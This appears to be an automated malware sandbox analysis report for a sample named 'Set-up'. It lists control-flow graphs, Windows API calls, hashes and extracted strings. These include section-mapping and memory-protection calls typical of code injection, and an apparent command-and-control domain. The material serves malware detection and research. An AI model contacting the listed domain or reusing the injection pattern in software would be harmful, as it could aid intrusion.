                                                                                                                                  control_flow_graph 441 5917490-59174ea 442 59174f0-591753a 441->442 442->442 443 591753c-5917555 442->443 445 5917557 443->445 446 591755f-59175aa CoCreateInstance 443->446 445->446 447 59175b0-59175e9 446->447 448 5917aee-5917b1b call 591faf0 GetVolumeInformationW 446->448 450 59175f0-591762d 447->450 453 5917b21-5917b47 call 58fd8a0 448->453 454 5917c9a-5917ca1 448->454 450->450 452 591762f-591765e SysAllocString 450->452 458 5917664-591767e CoSetProxyBlanket 452->458 459 5917add-5917aea SysFreeString 452->459 460 5917b50-5917b58 453->460 461 5917ad3-5917ad9 458->461 462 5917684-59176a7 458->462 459->448 460->460 463 5917b5a-5917b68 460->463 461->459 464 59176b0-59176cd 462->464 465 5917b7a-5917baf call 58fd8a0 463->465 466 5917b6a-5917b77 call 58eccd0 463->466 464->464 467 59176cf-591775b SysAllocString 464->467 474 5917bb0-5917bb8 465->474 466->465 469 5917760-591779d 467->469 469->469 472 591779f-59177c6 SysAllocString 469->472 477 5917abc-5917acf 472->477 478 59177cc-59177f2 472->478 474->474 475 5917bba-5917bc8 474->475 479 5917bda-5917c0f call 58fd8a0 475->479 480 5917bca-5917bd7 call 58eccd0 475->480 477->461 487 59177f8-59177fb 478->487 488 5917aae-5917ab8 478->488 489 5917c10-5917c18 479->489 480->479 487->488 490 5917801-5917806 487->490 488->477 489->489 491 5917c1a-5917c28 489->491 490->488 493 591780c-591785f VariantInit 490->493 495 5917c3a-5917c6a call 58fd8a0 491->495 496 5917c2a-5917c37 call 58eccd0 491->496 497 5917860-591787e 493->497 503 5917c70-5917c78 495->503 496->495 497->497 500 5917880-591788a 497->500 505 591788e-5917890 500->505 503->503 504 5917c7a-5917c88 503->504 504->454 506 5917c8a-5917c97 call 58eccd0 504->506 507 5917896-591789f 505->507 508 5917a9d-5917aaa VariantClear 505->508 506->454 507->508 510 59178a5-59178b2 507->510 508->488 512 59178b4-59178b9 510->512 513 59178ed 510->513 515 59178cc-59178d0 512->515 514 59178ef-5917917 call 58ecc40 513->514 524 5917a48-5917a5d 514->524 525 591791d-591792b 514->525 516 59178c0 515->516 517 59178d2-59178db 515->517 522 59178c1-59178ca 516->522 519 59178e2-59178e6 517->519 520 59178dd-59178e0 517->520 519->522 523 59178e8-59178eb 519->523 520->522 522->514 522->515 523->522 527 5917a64-5917a77 524->527 528 5917a5f 524->528 525->524 526 5917931-5917935 525->526 529 5917940-591794a 526->529 530 5917a79 527->530 531 5917a7e-5917a9a call 58ecc70 call 58ecc50 527->531 528->527 533 5917960-5917966 529->533 534 591794c-5917951 529->534 530->531 531->508 537 5917985-5917993 533->537 538 5917968-591796b 533->538 536 59179f0-59179f6 534->536 542 59179f8-59179fe 536->542 539 5917995-5917998 537->539 540 5917a0a-5917a13 537->540 538->537 543 591796d-5917983 538->543 539->540 544 591799a-59179e9 539->544 547 5917a15-5917a17 540->547 548 5917a19-5917a1c 540->548 542->524 546 5917a00-5917a02 542->546 543->536 544->536 546->529 549 5917a08 546->549 547->542 550 5917a44-5917a46 548->550 551 5917a1e-5917a42 548->551 549->524 550->536 551->536
                                                                                                                                  APIs
                                                                                                                                  • CoCreateInstance.COMBASE(05923AB8,00000000,00000001,05923AA8,00000000), ref: 059175A2
                                                                                                                                  • SysAllocString.OLEAUT32(3F8D398E), ref: 05917634
                                                                                                                                  • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 05917676
                                                                                                                                  • SysAllocString.OLEAUT32(C965CB65), ref: 059176D4
                                                                                                                                  • SysAllocString.OLEAUT32(C965CB65), ref: 059177A0
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 05917814
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                                                                  • String ID: ,-$47$C$\$m%g+$/)
                                                                                                                                  • API String ID: 65563702-582880345
                                                                                                                                  • Opcode ID: 6d3deb3b4f5d754b2721e1e9886ebe0539ee096129f5f0398d4967598b731f50
                                                                                                                                  • Instruction ID: 9269e083eba2becc9e16a14c79b71f95d3b610aded1fac9e7b958b2b64ab278a
                                                                                                                                  • Opcode Fuzzy Hash: 6d3deb3b4f5d754b2721e1e9886ebe0539ee096129f5f0398d4967598b731f50
                                                                                                                                  • Instruction Fuzzy Hash: 152243316083129BD714CF68CC85B6BBBA6EFC1314F148A1CF9959B2C1DB75E904CB96
                                                                                                                                  Function 058F43ED Relevance: 14.7, APIs: 1, Strings: 7, Instructions: 710COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 588 58f43ed-58f440b 589 58f4410-58f441e 588->589 589->589 590 58f4420 589->590 591 58f4422-58f4425 590->591 592 58f4427-58f444e 591->592 593 58f4450-58f4487 call 58e46c0 591->593 592->591 596 58f448c-58f449a 593->596 596->596 597 58f449c 596->597 598 58f449e-58f44a1 597->598 599 58f44a3-58f450f 598->599 600 58f4511-58f4538 call 58e46c0 598->600 599->598 603 58f453c-58f4543 600->603 604 58f453a-58f4572 call 58f7410 600->604 606 58f4e61 603->606 611 58f4576-58f45c9 call 58ecc40 call 58eee90 call 58f7410 604->611 612 58f4574 604->612 608 58f5413-58f541a 606->608 610 58f541c-58f541f call 58e4e70 608->610 619 58f2808-58f2836 call 58e4e80 610->619 620 58f2801-58f5430 610->620 629 58f45cd-58f4614 call 58ecc40 call 58eee90 611->629 630 58f45cb 611->630 612->611 626 58f283b-58f2849 619->626 626->626 628 58f284b-58f284f 626->628 632 58f2851-58f2854 628->632 640 58f4619-58f4627 629->640 630->629 634 58f2887-58f28c8 call 58e4d50 632->634 635 58f2856-58f2885 632->635 641 58f28cc 634->641 642 58f28ca-58f28ef 634->642 635->632 640->640 643 58f4629 640->643 641->610 646 58f28f4-58f2902 642->646 645 58f462b-58f462e 643->645 647 58f469f-58f46c3 call 58e46c0 645->647 648 58f4630-58f469d 645->648 646->646 649 58f2904 646->649 656 58f46c5-58f46e6 call 58f7410 647->656 657 58f4710-58f472e 647->657 648->645 651 58f2906-58f2909 649->651 652 58f293f-58f2997 call 58e47f0 651->652 653 58f290b-58f293d 651->653 652->608 664 58f299d 652->664 653->651 666 58f46ea-58f470b call 58ecc40 call 58eee90 656->666 667 58f46e8 656->667 659 58f4733-58f4741 657->659 659->659 662 58f4743 659->662 665 58f4745-58f4748 662->665 664->608 669 58f474a-58f477f 665->669 670 58f4781-58f479f call 58e46c0 665->670 666->657 667->666 669->665 675 58f47f3-58f4811 670->675 676 58f47a1-58f47cb call 58f7410 670->676 677 58f4816-58f4824 675->677 682 58f47cf-58f47ee call 58ecc40 call 58eee90 676->682 683 58f47cd 676->683 677->677 679 58f4826-58f4828 677->679 681 58f482b-58f482e 679->681 685 58f4855-58f4879 call 58e46c0 681->685 686 58f4830-58f4853 681->686 682->675 683->682 691 58f487b-58f489c call 58f7410 685->691 692 58f48c9-58f48ef 685->692 686->681 698 58f489e 691->698 699 58f48a0-58f48c6 call 58ecc40 call 58eee90 691->699 693 58f48f4-58f4902 692->693 693->693 695 58f4904-58f4906 693->695 697 58f490d-58f4910 695->697 701 58f4975-58f4996 call 58e4920 697->701 702 58f4912-58f4973 697->702 698->699 699->692 708 58f499c-58f49c9 call 58e4e70 701->708 709 58f4d3a-58f4db5 ExitProcess call 58f7c10 701->709 702->697 715 58f49cd-58f49e8 call 58ecc40 708->715 716 58f49cb 708->716 713 58f4dba-58f4dc9 call 58ede60 709->713 719 58f4dfd-58f4e2d call 58ecc50 * 2 713->719 720 58f4dcb-58f4dda 713->720 724 58f49ea-58f49f5 715->724 725 58f4a12-58f4a14 715->725 716->715 750 58f4e2f-58f4e32 call 58ecc50 719->750 751 58f4e37-58f4e3a 719->751 722 58f4dee-58f4df9 call 58ecc50 720->722 723 58f4ddc 720->723 722->719 727 58f4dde-58f4dea call 58f76f0 723->727 733 58f49f7-58f4a03 call 58f7570 724->733 730 58f4a16-58f4a1f 725->730 743 58f4dec 727->743 735 58f4a2d-58f4a68 call 58e4e80 730->735 736 58f4a21-58f4a28 730->736 747 58f4a05-58f4a10 733->747 748 58f4a6d-58f4a7b 735->748 736->709 743->722 747->725 748->748 749 58f4a7d 748->749 752 58f4a7f-58f4a82 749->752 750->751 754 58f4e3c-58f4e3f call 58ecc50 751->754 755 58f4e44-58f4e4b 751->755 756 58f4a84-58f4ab0 752->756 757 58f4ab2-58f4af2 call 58e46c0 752->757 754->755 759 58f4e4d-58f4e50 call 58ecc50 755->759 760 58f4e55-58f4e5c call 58ed410 755->760 756->752 765 58f4af7-58f4b05 757->765 759->760 760->606 765->765 766 58f4b07-58f4b09 765->766 767 58f4b10-58f4b13 766->767 768 58f4b8b-58f4bd3 call 58e46c0 767->768 769 58f4b15-58f4b89 767->769 772 58f4bd8-58f4be6 768->772 769->767 772->772 773 58f4be8-58f4bea 772->773 774 58f4bee-58f4bf1 773->774 775 58f4c29-58f4c71 call 58e4a50 774->775 776 58f4bf3-58f4c27 774->776 779 58f4c76-58f4c84 775->779 776->774 779->779 780 58f4c86 779->780 781 58f4c88-58f4c8b 780->781 782 58f4c8d-58f4cc1 781->782 783 58f4cc3-58f4d35 call 58e4a50 call 58f7590 781->783 782->781 783->730
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !$&$+$K$h$i$n
                                                                                                                                  • API String ID: 0-1869323657
                                                                                                                                  • Opcode ID: e2fe462ccd731e8f4d18125762ab81fe300dd12e9826558d1a771288f1a79bb9
                                                                                                                                  • Instruction ID: 9d41ce422cdcbce382116403e0242c384a612d3f1bf01e4d31110d6640971775
                                                                                                                                  • Opcode Fuzzy Hash: e2fe462ccd731e8f4d18125762ab81fe300dd12e9826558d1a771288f1a79bb9
                                                                                                                                  • Instruction Fuzzy Hash: B152C47160C7808BD724DB38C4987AFBBE2ABD9224F19497ED9DAC73D1D67888418713
                                                                                                                                  Function 054C1BBB Relevance: 11.2, APIs: 7, Instructions: 730memorynativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 054C1C54
                                                                                                                                  • NtMapViewOfSection.NTDLL(?,00000000), ref: 054C1CFC
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 054C2070
                                                                                                                                  • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 054C2125
                                                                                                                                  • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 054C2142
                                                                                                                                  • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 054C21E5
                                                                                                                                  • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 054C2218
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Virtual$ProtectSection$View$AllocCreate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2664363762-0
                                                                                                                                  • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                  • Instruction ID: dc7041101ddf62c8f9ccaf102eab9dd7a42ebf0fd4c17b5c061e087eb6cdf515
                                                                                                                                  • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                  • Instruction Fuzzy Hash: 34427A79608301AFD764CF25C844BABBBE9BFC8714F0449AEF9869B251D7B0E841CB51
                                                                                                                                  Function 058F200F Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 319COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1027 58f200f-58f203b call 58ede60 CoUninitialize 1030 58f2040-58f2052 1027->1030 1030->1030 1031 58f2054-58f206f 1030->1031 1032 58f2070-58f209e 1031->1032 1032->1032 1033 58f20a0-58f20ef 1032->1033 1034 58f20f0-58f2102 1033->1034 1034->1034 1035 58f2104-58f210c 1034->1035 1036 58f210e-58f2117 1035->1036 1037 58f212b-58f2135 1035->1037 1038 58f2120-58f2129 1036->1038 1039 58f214d 1037->1039 1040 58f2137-58f213b 1037->1040 1038->1037 1038->1038 1042 58f2150-58f215a 1039->1042 1041 58f2140-58f2149 1040->1041 1041->1041 1043 58f214b 1041->1043 1044 58f217d 1042->1044 1045 58f215c-58f2161 1042->1045 1043->1042 1047 58f217f-58f2187 1044->1047 1046 58f2170-58f2179 1045->1046 1046->1046 1048 58f217b 1046->1048 1049 58f219d 1047->1049 1050 58f2189-58f218f 1047->1050 1048->1047 1051 58f21a0-58f21ad 1049->1051 1052 58f2190-58f2199 1050->1052 1054 58f21af-58f21b4 1051->1054 1055 58f21cd 1051->1055 1052->1052 1053 58f219b 1052->1053 1053->1051 1056 58f21c0-58f21c9 1054->1056 1057 58f21cf-58f21db 1055->1057 1056->1056 1058 58f21cb 1056->1058 1059 58f21dd-58f21df 1057->1059 1060 58f21f1-58f22b4 1057->1060 1058->1057 1061 58f21e0-58f21ed 1059->1061 1062 58f22c0-58f22e5 1060->1062 1061->1061 1063 58f21ef 1061->1063 1062->1062 1064 58f22e7-58f2316 1062->1064 1063->1060 1065 58f2320-58f2363 1064->1065 1065->1065 1066 58f2365-58f239a call 58efca0 1065->1066
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Uninitialize
                                                                                                                                  • String ID: ),>,$; 34$[wy$worddosofrm.shop
                                                                                                                                  • API String ID: 3861434553-1776702198
                                                                                                                                  • Opcode ID: de2ceb5b447c03903f310788b348aa4e68bd9bd4e3948ba88c8f274fc3f39cc6
                                                                                                                                  • Instruction ID: 139cc36fbab4cb097469fc9a8864441a4689dcd787033a7d94ee52be86796f1f
                                                                                                                                  • Opcode Fuzzy Hash: de2ceb5b447c03903f310788b348aa4e68bd9bd4e3948ba88c8f274fc3f39cc6
                                                                                                                                  • Instruction Fuzzy Hash: 34A1D174209B828FD321CF29C490626FBF2FF5A300B18869CD9D68BB55C735B856CB95
                                                                                                                                  Function 054703FB Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 399threadCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1134 54703fb-5470563 call 54709ab call 5470fab call 547115b call 5470d4b 1143 5470994-5470997 1134->1143 1144 5470569-5470570 1134->1144 1145 547057b-547057f 1144->1145 1146 54705a1-547061c GetPEB 1145->1146 1147 5470581-547059f call 5470ecb 1145->1147 1148 5470627-547062b 1146->1148 1147->1145 1150 5470643-5470655 call 5470b0b 1148->1150 1151 547062d-5470641 1148->1151 1157 5470657-547067d 1150->1157 1158 547067f-54706a0 CreateThread 1150->1158 1151->1148 1159 54706a3-54706a7 1157->1159 1158->1159 1161 54706ad-54706e0 call 547100b 1159->1161 1162 5470968-547098b 1159->1162 1161->1162 1166 54706e6-5470735 1161->1166 1162->1143 1168 5470740-5470746 1166->1168 1169 547078e-5470792 1168->1169 1170 5470748-547074e 1168->1170 1173 5470860-5470953 call 5470b0b call 54709ab call 5470fab 1169->1173 1174 5470798-54707a5 1169->1174 1171 5470761-5470765 1170->1171 1172 5470750-547075f 1170->1172 1175 5470767-5470775 1171->1175 1176 547078c 1171->1176 1172->1171 1200 5470955 1173->1200 1201 5470958-5470962 1173->1201 1177 54707b0-54707b6 1174->1177 1175->1176 1178 5470777-5470789 1175->1178 1176->1168 1181 54707e6-54707e9 1177->1181 1182 54707b8-54707c6 1177->1182 1178->1176 1183 54707ec-54707f3 1181->1183 1185 54707e4 1182->1185 1186 54707c8-54707d7 1182->1186 1183->1173 1189 54707f5-54707fe 1183->1189 1185->1177 1186->1185 1187 54707d9-54707e2 1186->1187 1187->1181 1189->1173 1191 5470800-5470810 1189->1191 1194 547081b-5470827 1191->1194 1196 5470829-5470856 1194->1196 1197 5470858-547085e 1194->1197 1196->1194 1197->1183 1200->1201 1201->1162
                                                                                                                                  APIs
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 0547069E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateThread
                                                                                                                                  • String ID: %Q8
                                                                                                                                  • API String ID: 2422867632-2726095304
                                                                                                                                  • Opcode ID: 89bde1e733b70f67982f4dd5d373a6ee043e125ba48ce3fa45a4cbc8249d16df
                                                                                                                                  • Instruction ID: 0b4f662437457ef77752bbf2bbedc9d7e3cf6ecf3e00f75fb70c5e700c3acfc2
                                                                                                                                  • Opcode Fuzzy Hash: 89bde1e733b70f67982f4dd5d373a6ee043e125ba48ce3fa45a4cbc8249d16df
                                                                                                                                  • Instruction Fuzzy Hash: E812B3B5E01219DBDB14CF98C994BEEBBB2FF88304F2481A9D519AB385C7346A41CF54
                                                                                                                                  Function 054709BB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103threadCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1206 54709bb-5470a12 GetPEB 1207 5470a1d-5470a21 1206->1207 1208 5470a27-5470a32 1207->1208 1209 5470ac1-5470ac8 1207->1209 1211 5470abc 1208->1211 1212 5470a38-5470a4f 1208->1212 1210 5470ad3-5470ad7 1209->1210 1214 5470ad9-5470ae6 1210->1214 1215 5470ae8-5470aef 1210->1215 1211->1207 1216 5470a74-5470a8c CreateThread 1212->1216 1217 5470a51-5470a72 1212->1217 1214->1210 1219 5470af1-5470af3 1215->1219 1220 5470af8-5470afd 1215->1220 1221 5470a90-5470a98 1216->1221 1217->1221 1219->1220 1221->1211 1223 5470a9a-5470ab7 1221->1223 1223->1211
                                                                                                                                  APIs
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 05470A87
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateThread
                                                                                                                                  • String ID: ,
                                                                                                                                  • API String ID: 2422867632-3772416878
                                                                                                                                  • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                  • Instruction ID: f4e4a31f7939efe15284cc2877a054509b64a7a5aec557271067c707c8dd500d
                                                                                                                                  • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                  • Instruction Fuzzy Hash: 4D41A274A01209EFDB04CF98C994BEEB7B1BB88314F208199D515AB380D771AE81CF94
                                                                                                                                  Function 05920670 Relevance: 2.6, Strings: 2, Instructions: 128COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID: %*+($@
                                                                                                                                  • API String ID: 2994545307-2878053842
                                                                                                                                  • Opcode ID: 0dd6f937da4491d41dee888483ee4b5b45b003388dd126cb5176a7d11f5a876e
                                                                                                                                  • Instruction ID: 8733adf560ab537c41e806250f464e4f4d7c988b450b883a36193649f5f8d2cd
                                                                                                                                  • Opcode Fuzzy Hash: 0dd6f937da4491d41dee888483ee4b5b45b003388dd126cb5176a7d11f5a876e
                                                                                                                                  • Instruction Fuzzy Hash: 0B3102B0A083209BD714DF28D889B7BB7F9FF85324F14862CE89957395E7359904CB82
                                                                                                                                  Function 058F841D Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d94bbe24efa32eff2df4b2ee6b7b0315668c2ffe41fc75c05200c294de0f4e26
                                                                                                                                  • Instruction ID: 5999089e7b516b6ca7ee0c22693d6d31f871ad52aee1db58733b4ea4952c7d08
                                                                                                                                  • Opcode Fuzzy Hash: d94bbe24efa32eff2df4b2ee6b7b0315668c2ffe41fc75c05200c294de0f4e26
                                                                                                                                  • Instruction Fuzzy Hash: 0841C4B290C3519FCB24CF18C45166FB7E2ABD9204F19892DEADAC7242E635DD05CB92
                                                                                                                                  Function 0591CE20 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LdrInitializeThunk.NTDLL(059204D8,?,0000000B,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0591CE4E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                  • Opcode ID: ad932b2b00559e9cb24108de1499e2b8809661d28f6ef4b94d1e3dfa2d030c47
                                                                                                                                  • Instruction ID: 88b266f08c8d8dc656098dc4a5309144cffe720ba9f358246b073a6e310c2786
                                                                                                                                  • Opcode Fuzzy Hash: ad932b2b00559e9cb24108de1499e2b8809661d28f6ef4b94d1e3dfa2d030c47
                                                                                                                                  • Instruction Fuzzy Hash: 47E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                                                                                  Function 05921440 Relevance: 1.5, Strings: 1, Instructions: 261COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID: %*+(
                                                                                                                                  • API String ID: 2994545307-3233224373
                                                                                                                                  • Opcode ID: b7befcff905520bad6801cdfe0de385769e9770f6a4e70e09a45de539f679204
                                                                                                                                  • Instruction ID: 0072a07905d4c93410745d046db43b7e9e8eb812656d8b40500a50fb91cea607
                                                                                                                                  • Opcode Fuzzy Hash: b7befcff905520bad6801cdfe0de385769e9770f6a4e70e09a45de539f679204
                                                                                                                                  • Instruction Fuzzy Hash: 1D61F13160C3219FD728CE24D891A3FB7E6FBC5314F19892CE99687295D731AC11D792
                                                                                                                                  Function 05920BF0 Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID: %*+(
                                                                                                                                  • API String ID: 2994545307-3233224373
                                                                                                                                  • Opcode ID: f764bd4585df1a10212cac4152ccb04379c25e58bb52a53a932f388786026ed7
                                                                                                                                  • Instruction ID: 1be041b98559f0adba7b9fe2e285b2366dd8c08e01c95ef0ffc11a32a3869fbb
                                                                                                                                  • Opcode Fuzzy Hash: f764bd4585df1a10212cac4152ccb04379c25e58bb52a53a932f388786026ed7
                                                                                                                                  • Instruction Fuzzy Hash: 3571F575608311ABDB24DF28C855A3FB7E6FFC4750F19C92CE88A8B259EB30E8518741
                                                                                                                                  Function 05920890 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID: %*+(
                                                                                                                                  • API String ID: 2994545307-3233224373
                                                                                                                                  • Opcode ID: e0742271d4981fc2b56cf44d7e8a7dbc4811d25293c3cacdd4ab4d7ce318f594
                                                                                                                                  • Instruction ID: a22780f3390d42b2b3c0db7fea2af79e5e6637697428f0bf930f25d90abd55ce
                                                                                                                                  • Opcode Fuzzy Hash: e0742271d4981fc2b56cf44d7e8a7dbc4811d25293c3cacdd4ab4d7ce318f594
                                                                                                                                  • Instruction Fuzzy Hash: 2D31273835C314AFF7248A289C89B3FB7EAFB85714F24592CF5C697288D660EC508A45
                                                                                                                                  Function 05920AE0 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 2994545307-2766056989
                                                                                                                                  • Opcode ID: 0f5fb32b003c89ed800a9a93822042cb7131f7970a9929e671da155c8b818300
                                                                                                                                  • Instruction ID: 867c3a4f397934ce7702ab590f146ce9d98a96fe118283332ef1f9b76d5e845c
                                                                                                                                  • Opcode Fuzzy Hash: 0f5fb32b003c89ed800a9a93822042cb7131f7970a9929e671da155c8b818300
                                                                                                                                  • Instruction Fuzzy Hash: 2821F37111C3049FC724DF18D8C566FBBF9FB86328F14892CEA9987290D3359808CBA2
                                                                                                                                  Function 05905D60 Relevance: .4, Instructions: 390COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                  • Opcode ID: d1e24e57a2514775cc17d10727ebd4cfa5190f1f8c9b5dec9cee1ccf620f94b3
                                                                                                                                  • Instruction ID: 8b15771e857d03dcc05bf4c2262e64002ea4310bb07e661e4c2fa70dd02c1adf
